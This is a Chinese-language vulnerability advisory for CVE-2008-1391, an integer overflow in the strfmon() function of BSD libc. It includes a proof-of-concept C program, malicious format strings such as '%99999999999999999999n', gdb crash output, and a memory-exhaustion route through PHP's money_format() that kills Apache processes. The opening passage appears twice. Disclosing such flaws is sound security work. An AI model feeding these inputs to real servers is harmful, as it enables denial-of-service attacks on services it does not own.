BUGTRAQ ID: 28479 CVE ID:CVE-2008-1391 CNCVE ID:CNCVE-20081391 多个BSD平台'strfmon()'函数处理存在整数溢出,可能以受影响应用程序上下文执行任意代码。失败的尝试可导致拒绝服务。 问题代码类似如下: #include <monetary.h> ssize_t strfmon(char * restrict s, size_t maxsize, const char * restrict format, ...); - --- 1. /usr/src/lib/libc/stdlib/strfmon.c -整数溢出 主要问题存在于strfmon()函数中,当以如下方法使用这个函数时: - ---example-start-- #include <stdio.h> #include <monetary.h> int main(int argc, char* argv[]){ char buff[51]; char *bux=buff; int res; res=strfmon(bux, 50, argv[1], "0"); return 0; } - ---example-end-- 并编译,可操作如下格式串: cxib# ./pln %99999999999999999999n Segmentation fault (core dumped) 问题如下: cxib# gdb -q pln (no debugging symbols found)...(gdb) r %99999999999999999999n Starting program: /cxib/C/pln %99999999999999999999n (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x2814e0e6 in memmove () from /lib/libc.so.7 (gdb) memmove()会重分配内存。 cxib# gdb -q pln (no debugging...
BUGTRAQ ID: 28479 CVE ID:CVE-2008-1391 CNCVE ID:CNCVE-20081391 多个BSD平台'strfmon()'函数处理存在整数溢出,可能以受影响应用程序上下文执行任意代码。失败的尝试可导致拒绝服务。 问题代码类似如下: #include <monetary.h> ssize_t strfmon(char * restrict s, size_t maxsize, const char * restrict format, ...); - --- 1. /usr/src/lib/libc/stdlib/strfmon.c -整数溢出 主要问题存在于strfmon()函数中,当以如下方法使用这个函数时: - ---example-start-- #include <stdio.h> #include <monetary.h> int main(int argc, char* argv[]){ char buff[51]; char *bux=buff; int res; res=strfmon(bux, 50, argv[1], "0"); return 0; } - ---example-end-- 并编译,可操作如下格式串: cxib# ./pln %99999999999999999999n Segmentation fault (core dumped) 问题如下: cxib# gdb -q pln (no debugging symbols found)...(gdb) r %99999999999999999999n Starting program: /cxib/C/pln %99999999999999999999n (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x2814e0e6 in memmove () from /lib/libc.so.7 (gdb) memmove()会重分配内存。 cxib# gdb -q pln (no debugging symbols found)...(gdb) r %.9999999999n Starting program: /cxib/C/pln %.9999999999n (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x2814f093 in abort () from /lib/libc.so.7 下个例子是: cxib# ./pln %#99999999999999999999n Long execution time. Let's try check this process : - -------------------------- cxib# ps -aux | grep pln cxib 1843 89.1 13.2 140320 119588 p2 R+ 4:29PM 0:09.68 ./pln %#99999999999999999999n cxib# ps -aux | grep pln cxib 1843 94.7 48.4 482336 438236 p2 R+ 4:29PM 1:54.07 ./pln %#99999999999999999999n 1 VSZ=140320 2 VSZ=482336 - ---------------------------- pln会分配更多的内存,PHP在money_format()函数中使用strfmon(),当我们在Apache中使用mod_php5,我们可以建立如下利用方法,结果如下: - ---apache-child-die--- swap_pager: out of swap space swap_pager_getswapspace(16): failed Mar 15 21:03:23 cxib kernel: pid 1210 (httpd), uid 80, was killed: out of swap space - ---apache-child-die--- NetBSD NetBSD 4.0 FreeBSD FreeBSD 6.0 .x FreeBSD FreeBSD 6.0 -STABLE FreeBSD FreeBSD 6.0 -RELEASE FreeBSD FreeBSD 7.0 BETA4 FreeBSD FreeBSD 7.0 -RELENG FreeBSD FreeBSD 7.0 -PRERELEASE FreeBSD FreeBSD 7.0 FreeBSD FreeBSD 6.0 -RELEASE-p5 可联系供应商获得补丁信息: <a href=http://www.netbsd.org/ target=_blank>http://www.netbsd.org/</a>
